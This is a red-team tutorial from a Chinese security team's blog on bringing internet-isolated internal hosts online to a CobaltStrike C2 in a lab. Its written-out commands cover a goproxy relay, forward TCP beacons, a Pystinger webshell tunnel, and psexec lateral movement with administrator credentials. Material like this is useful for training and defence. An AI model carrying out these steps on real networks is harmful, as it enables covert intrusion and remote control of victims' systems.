【红蓝对抗】内网不出网机器上线CobaltStrike

  • A+
所属分类:安全文章

【红蓝对抗】内网不出网机器上线CobaltStrike

场景提出

已渗透至内网,获取到DMZ区出网机器CS权限发现内网不出网(此时又分为两种情况:1、内网和DMZ区互通;2、DMZ可通内网但内网不通DMZ),根据以上叙述可以简单搭建测试环境。


给出简单拓扑:

C2服务器:123.56.108.135

跳板机(双网卡):192.168.163.129 ; 10.10.10.128

目标机器:10.10.10.129

【红蓝对抗】内网不出网机器上线CobaltStrike

Goproxy上线CS

本种方式适用于目标机器和DMZ互通的情况下,具体思路如下:

跳板机开启http代理供目标机器使用,CobaltStrike新建一个监听器设置HTTP Proxy为跳板机代理地址,CobaltStrike生成stagerless木马上传到目标机器,如不可直接上传可使用跳板机搭配certutil.exe或者命令执行写webshell等方式进行中转上传,目标机器执行木马即可上线。


最终上线路径:

10.10.10.129---->10.10.10.128:18080---->123.56.108.135

【红蓝对抗】内网不出网机器上线CobaltStrike

操作步骤

  1. 上传goproxy到跳板机,开启http代理

proxy.exe http -t tcp -p "0.0.0.0:18080" --daemon

【红蓝对抗】内网不出网机器上线CobaltStrike

  1. CobaltStrike新建监听器,设置HTTP Proxy为http://10.10.10.128:18080

【红蓝对抗】内网不出网机器上线CobaltStrike

  1. 生成stageless的木马,监听器选择刚生成的goproxy

【红蓝对抗】内网不出网机器上线CobaltStrike

  1. 目标机器执行木马,可上线CS

【红蓝对抗】内网不出网机器上线CobaltStrike

正向木马上线CS

此方法适用于DMZ能通内网但内网不通DMZ的状况即无法反弹会话的情况,遇到这种场景就要使用正向连接的木马来解决,在目标主机开启一个木马端口然后通过跳板机来连接。


操作步骤

  1. CobaltStrike创建一个beacon_tcp监听器

【红蓝对抗】内网不出网机器上线CobaltStrike

  1. CS生成一个stageless木马,监听器选再Forword

【红蓝对抗】内网不出网机器上线CobaltStrike

  1. 运行生成的木马,并在10.10.10.128 beacon中执行connect x.x.x.x 18888即可建立子beacon上线CS。

connect 10.10.10.129 18888

【红蓝对抗】内网不出网机器上线CobaltStrike

【红蓝对抗】内网不出网机器上线CobaltStrike

Pystinger上线CS

毒刺(Pystinger)通过webshell搭建内网socks4代理,可用于上线CobaltStrike,此方法适用于目标主机不出网但存在web应用可被互联网访问的情况

操作步骤

  1. 下载pytinger,选择适当的代理脚本上传到目标服务器,直接访问出现UTF-8即为成功。

项目地址:https://github.com/FunnyWolf/pystinger/blob/master/readme_cn.md

【红蓝对抗】内网不出网机器上线CobaltStrike

  1. 将stinger_server.exe上传到目标服务器并开启服务端等待客户端连接。

start start stinger_server.exe 0.0.0.0

【红蓝对抗】内网不出网机器上线CobaltStrike

  1. vps客户端连接服务端

./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000

【红蓝对抗】内网不出网机器上线CobaltStrike

  1. CobaltStrike新建监听器,HTTP Host设置为目标机器IP,端口默认为60020

【红蓝对抗】内网不出网机器上线CobaltStrike

  1. 生成一个stage木马,监听器选择新建的pystinger即可上线CS

【红蓝对抗】内网不出网机器上线CobaltStrike

SMB Beacon

使用CobaltStrike进行内网端口扫描时发现一台机器445端口开放且攻击者有此台机器Administrator密码但是这台机器不能正常出网的情况下可使用Beacon SMB获取到Beacon Shell。

操作步骤

  1. CobaltStrike新建SMB Listener

【红蓝对抗】内网不出网机器上线CobaltStrike

  1. 建立IPC$空连接,并测试

beacon> shell net use \10.10.10.136admin$ /user:"administrator" "xxxxxxx"
beacon> shell dir \10.10.10.136c$

【红蓝对抗】内网不出网机器上线CobaltStrike

  1. 使用Psexec获取SMB Beacon Shell

jump psexec 10.10.10.136 SMB

【红蓝对抗】内网不出网机器上线CobaltStrike

【红蓝对抗】内网不出网机器上线CobaltStrike

参考

goproxy项目地址:https://github.com/snail007/goproxy/releases

pystinger项目地址:https://github.com/FunnyWolf/pystinger/blob/master/readme_cn.md

不出网机器上线方法:https://xz.aliyun.com/t/8671#toc-5


E

N

D



Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、系统安全、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

团队作为“省级等保关键技术实验室”先后与哈工大、齐鲁银行、聊城大学、交通学院等多个高校名企建立联合技术实验室。团队公众号自创建以来,共发布原创文章370余篇,自研平台达到26个,目有15个平台已开源。此外积极参加各类线上、线下CTF比赛并取得了优异的成绩。如有对安全行业感兴趣的小伙伴可以踊跃加入或关注我们

【红蓝对抗】内网不出网机器上线CobaltStrike

本文始发于微信公众号(Tide安全团队):【红蓝对抗】内网不出网机器上线CobaltStrike

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: